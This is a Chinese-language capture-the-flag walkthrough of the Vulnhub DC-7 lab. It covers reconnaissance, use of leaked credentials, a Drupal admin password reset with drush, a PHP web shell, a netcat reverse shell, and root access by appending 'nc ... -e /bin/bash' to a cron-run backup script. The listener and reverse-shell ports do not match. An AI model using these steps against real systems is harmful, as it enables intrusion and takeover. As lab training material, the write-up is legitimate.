Vulnhub渗透靶机系列----DC7

Vulnhub渗透靶机系列----DC7

下载地址

http://www.five86.com/downloads/DC-7.zip

https://download.vulnhub.com/dc/DC-7.zip

环境说明

dc7靶机:10.139.10.147
kali攻击机:10.139.10.152

信息收集

查看存活主机

sudo netdiscover 10.139.10.0/24

对比mac地址得知ip为10.139.10.147

nmap扫端口

sudo namp -sS -sV -A -n 10.139.10.147

可以看到存在80端口和22端口

访问80，又是drual框架，还有提示，大概意思就是暴力破解不行了，找新思路

DC-7 introduces some "new" concepts, but I'll leave you to figure out what they are. :-)

While this challenge isn't all that technical, if you need to resort  to brute forcing or a dictionary attacks, you probably won't succeed.

What you will have to do, is to think "outside" the box.

Way "outside" the box. :-)

指纹识别

可以看到是drupal

发现右下角有作者名字

源码泄露

bing搜索DC7USER

在他的代码里找到相关配置账密

username:dc7user
password:MdR3xOgB7#dW

漏洞利用

ssh登录

刚开始尝试了登录网站，发现登录失败。

然后尝试ssh远程登录

ssh dc7user@10.139.10.147

不要忽略有mail

发现backups和mox两个文件，打开backups文件发现，这两个乱码打不开

在mail发现backups.sh文件

查看该文件，发现drush命令

drush命令：是drupal专属的一个操作系统命令

修改网站密码

chatgpt渗透(dog)，提示我们去根目录输入命令

drush user:password admin --password="123456"

成功修改

然后拿admin去登录网站

获取shell

刚开始Content—>Add content–>Basic page下写木马，发现这个框架不支持php，可以去下载个php的扩展

在Manage–extend，

https://ftp.drupal.org/files/projects/php-8.x-1.x-dev.tar.gz

第一次失败了，再来了一次就行了

成功安装

还是那个页面，选上php页面最后安装，开始写shell

在刚开始的content页面选php格式写shell，同时kali监听,然后点save，会自动反弹到shell

nc -lnvp 4444

开启python交互

python -c 'import pty;pty.spawn("/bin/bash")'

提权

在/opt/scripts目录下的backups.sh脚本文件所属组是www-data，所以www-data用户可以对这个脚本文件进行操作，并且这个脚本文件定时执行可以利用它来反弹shell

我们从前面知道这个脚本是有root权限的，那么在里面写的反弹shell也是root权限

写入计划任务，同时监听4444端口,因为是计划任务，所有需要等待时间，不能直接以当前身份执行那个文件，那样弹出来的不是root，而是当前的www-data权限

nc -lnvp 4444

echo "nc 10.139.10.152 4445 -e /bin/bash" >>/opt/scripts/backups.sh
```![在这里插入图片描述](https://img-blog.csdnimg.cn/1788b68b8da14f94a37b1c98bcdb38dd.png)


拿到flag

![在这里插入图片描述](https://img-blog.csdnimg.cn/50e5a6f70c504f578ddd438ef74e1f52.png)